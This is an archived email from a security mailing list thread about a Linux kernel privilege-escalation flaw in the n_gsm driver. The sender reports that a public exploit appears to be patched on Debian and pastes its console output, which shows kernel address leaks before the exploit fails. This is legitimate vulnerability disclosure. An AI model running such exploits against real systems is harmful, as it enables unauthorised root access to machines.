Received: by 2002:a05:6500:1b45:b0:1f5:f2ab:c469 with SMTP id cz5csp585760lqb; Wed, 17 Apr 2024 05:40:32 -0700 (PDT) X-Forwarded-Encrypted: i=2; AJvYcCWG0Itoiz5VKvCA4AQ/rAJ8CH/sTGEpvUjViB61VJ8BCvjjc/ymvK3hu8QCtN4X4raxkebvZGx7SQ7VU/cguwiE7VFOo6UdTsDbxf8/BQ== X-Google-Smtp-Source: AGHT+IFWwAHcfzYxxmDj984Z5jPhLj2Hj19PkgE/P27R/Opf8E12mHsj7SKwXO5QZ/Hn++isEJ51 X-Received: by 2002:ad4:5def:0:b0:69b:81d5:cd7 with SMTP id jn15-20020ad45def000000b0069b81d50cd7mr9383358qvb.3.1713357631894; Wed, 17 Apr 2024 05:40:31 -0700 (PDT) ARC-Seal: i=1; a=rsa-sha256; t=1713357631; cv=none; d=google.com; s=arc-20160816; b=mlgw4kO7EWFSjO0nMvFZcJb3Ru/NNpxRsE8aB9OVZ5pwlpNBYGTpfN17IUalBFrYIB qojhGUPwgCk5YOhzmNEdeaZtxecKcOY5hQ+2SkoXsNQVN6auWrX/FXzRuBvucuw8XVEW qBN+0qfpx4s0+R9QmPcyG5L8o5FDwoyp7rvUVnv3FXDJGakYH2j3Y1C660ClRi0XXMsz QYiHcG3+uiGlWsFLvZkw7qC0O21S9HLrl6VXlo8yZpQSXXXLycoSqexIlDEaMaxC+/2P ibxehGEbJLrlUKz2oL3SSeK552UStuALZzYRrpH2lQX2hFbf55/eR/a8J2SgXp44uAY4 NtCA== ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816; h=subject:in-reply-to:autocrypt:from:references:to:user-agent :mime-version:date:message-id:delivered-to:delivered-to:reply-to :list-id:list-subscribe:list-unsubscribe:list-help:list-post :precedence:mailing-list; bh=vywqZNxKml2FstOBGm2WDaMkhkCH/dyD6b+xl7iwJWo=; fh=9jsPTyo6edd9xvAeG+KFFrRrXMmgB/RdwUKOrvy9dcA=; b=ApIgGpV6Atju0Fy/CJ8gCRc706L6uvaWzbE2oISzaK5Qpucc2hhDKFvgYzfY5X+2B/ AULD6M2PE2abG2ckBt1rEuboIwaqBJpNK+dEAgTRVw1iYisas/8itp8+O8kuFwEht4Lp vzs8+s0AXPHSUQOliOMPoFINI3zaHtOJPB+gjCVyRlbGV6WfWRrK2f4R17hZxewkFeMp DDjj8nxCGKC0XIZDnTdki0rzJiC5MxRX/WjeTbQKUNILp8N4/jRAq6lGBWrye5uMFZ9O FJKAaNSXh/u58mJxySxDw4m/AKmSBfB04eMGa1EVv2A9ClJnOeiK7FXRE1HBdZH3X3zS 6jXg==; dara=google.com ARC-Authentication-Results: i=1; mx.google.com; spf=pass (google.com: domain of oss-security-return-30039-linux.lists.archive=gmail.com@lists.openwall.com designates 193.110.157.125 as permitted sender) smtp.mailfrom="oss-security-return-30039-linux.lists.archive=gmail.com@lists.openwall.com" Return-Path: Received: from second.openwall.net (second.openwall.net. [193.110.157.125]) by mx.google.com with SMTP id ey12-20020a0562140b6c00b0069b6afaf166si10597566qvb.131.2024.04.17.05.40.31 for ; Wed, 17 Apr 2024 05:40:31 -0700 (PDT) Received-SPF: pass (google.com: domain of oss-security-return-30039-linux.lists.archive=gmail.com@lists.openwall.com designates 193.110.157.125 as permitted sender) client-ip=193.110.157.125; Authentication-Results: mx.google.com; spf=pass (google.com: domain of oss-security-return-30039-linux.lists.archive=gmail.com@lists.openwall.com designates 193.110.157.125 as permitted sender) smtp.mailfrom="oss-security-return-30039-linux.lists.archive=gmail.com@lists.openwall.com" Received: (qmail 19758 invoked by uid 550); 17 Apr 2024 12:40:11 -0000 Mailing-List: contact oss-security-help@lists.openwall.com; run by ezmlm Precedence: bulk List-Post: List-Help: List-Unsubscribe: List-Subscribe: List-ID: Reply-To: oss-security@lists.openwall.com Delivered-To: mailing list oss-security@lists.openwall.com Delivered-To: moderator for oss-security@lists.openwall.com Received: (qmail 15671 invoked from network); 17 Apr 2024 08:47:58 -0000 Authentication-Results: mail.absynth.de; auth=pass smtp.auth=info@christopher-kunz.de smtp.mailfrom=info@christopher-kunz.de Content-Type: multipart/alternative; boundary="------------O2w6g93SH5nIxaAw1eYey0G4" Message-ID: Date: Wed, 17 Apr 2024 10:47:46 +0200 MIME-Version: 1.0 User-Agent: Mozilla Thunderbird To: oss-security@lists.openwall.com References: <607d5716-128f-44c5-ab52-6dde4ca6e8a4@christopher-kunz.de> <20240410211457.GA20881@openwall.com> <20240416201602.GA21501@openwall.com> From: "Dr. Christopher Kunz" Autocrypt: addr=info@christopher-kunz.de; keydata= xsDiBD3U55kRBADKaqmPY/RBZ0luAFvOsa2lqQN8qXEimlCrbe0+WWywWDYNO/0c5B1FhUt2 heF12OV9u1ldDdynB/awdV3NYaoizce86XQzQGcPpIOlEgI9iTTc1FSP9zDkkljLMrMB8WGK Q8WH6yLT+BOTIoK/rMs9DEN0hcsxOZY1wTEzhOfewwCg/7fHkook6P1/O/iOG3k/r90Um98D /AvzlFtPaRn5qiCWjeopDW1RAJNLvWwKs1HHv8m1UOtMNisqObD3SuHn9lp4FfGAu7gaJoqI /l6Rk02dgmBq+gyV+qg8PYXMlhh0xEfEO/TPPjx+nZnDRvO59tOj0pg2GLpIvQtdlwow1Iq4 r2XfHUk1b827GZGAg1+ckkkNSG24A/9l238stiojp+GYwpuYkGrxROSYX+0slzRc40DHjtrb Jidz2Usmilyvt5WA1iBmAKw3L2TLQKpLtxAkGWSrDfdnl38VrYGMEM6WVctY6TxrqzrQLhaw W+17goNN73S3uP3C0YrdVjZc5jl0xlfli4zP7HmxL1YyRlLQ22aVcdDmS80rQ2hyaXN0b3Bo ZXIgS3VueiA8aW5mb0BjaHJpc3RvcGhlci1rdW56LmRlPsJ4BBMRAgA4AhsDBgsJCAcDAgMV AgMDFgIBAh4BAheAFiEEyIKO0X3RkBHAiOpQXPou6zl6ysEFAmWdKLICGQEACgkQXPou6zl6 ysEHsQCfeqMRH0HyzVzl6XyNrxXdi0kSacYAnjXCcViWthCxB04fgluoiFw7b02TzsFNBD3U 55kQCAD2Qle3CH8IF3KiutapQvMF6PlTETlPtvFuuUs4INoBp1ajFOmPQFXz0AfGy0OplK33 TGSGSfgMg71l6RfUodNQ+PVZX9x2Uk89PY3bzpnhV5JZzf24rnRPxfx2vIPFRzBhznzJZv8V +bv9kV7HAarTW56NoKVyOtQa8L9GAFgr5fSI/VhOSdvNILSd5JEHNmszbDgNRR0PfIizHHxb LY7288kjwEPwpVsYjY67VYy4XTjTNP18F1dDox0YbN4zISy1Kv884bEpQBgRjXyEpwpy1obE AxnIByl6ypUM2Zafq9AKUJsCRtMIPWakXUGfnHy9iUsiGSa6q6Jew1XpMgs7AAICB/97dSwj NNOvwX1CYynQFaXrajIBF9fSZcOJNZ5vh/+ejkl2nobkQicbI97dKYttanBaF4O//lPjNcbO iXkiqEI8FQPyp5I+KIkVy6MiNM09zd0qHVwlihok2JG5wSGXfUsXjk3iPsxIVhWZSrB2q0By Av95xcvUtxQl5cCGGqTxBIsGjiN4wkDS0FNXFH2hOuH5pCl+cbDdZmYTc1O+aeSygvLN76gs tBgDODp8p2Fiu7RL99SRLTIHdniSvOr/bm4BDRYY0D6P/MoZQydZPMmZAOv3qnOkPox/9e5/ zP8cmLm08gbez8wjfl6Rl5OjngTIatupEWXZK022C2+LJBeFwkwEGBECAAwFAj3U55kFGwwA AAAACgkQXPou6zl6ysHXxgCgw8C3Y9WTlhK6j3KgyciAF6X+odsAnja8RhnAa3HRM8YZbeaW DC6HBdDe In-Reply-To: <20240416201602.GA21501@openwall.com> Subject: Re: [oss-security] New Linux LPE via GSMIOC_SETCONF_DLCI? --------------O2w6g93SH5nIxaAw1eYey0G4 Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 8bit Am 16.04.24 um 22:16 schrieb Solar Designer: > I'm puzzled by the lack of follow-ups on this, but anyway @FFFVR_ > tweeted they also found (more) vulnerabilities in the n_gsm driver: > FWIW, YuriiCrimson's bug for 5.15 - 6.1 seems to be patched on current Debian: debianexploitgsm:/tmp/ExploitGSM/ExploitGSM_5_15_to_6_1$ ./ExploitGSM debian kallsyms restricted, begin retvial kallsyms table detected kernel path-> /boot/vmlinuz-6.1.0-20-amd64 detected compressed format -> xz Uncompressed kernel size -> 65900116 successfully taken kernel! begin try leak startup_xen! startup_xen leaked address  -> ffffffff8546f1c0 text leaked address         -> ffffffff83400000 lockdep_map_size     -> 32 spinlock_t_size      -> 4 mutex_size           -> 32 gsm_mux_event_offset -> 56 Error set line discipline N_GSM, Operation not permitted --cku --------------O2w6g93SH5nIxaAw1eYey0G4--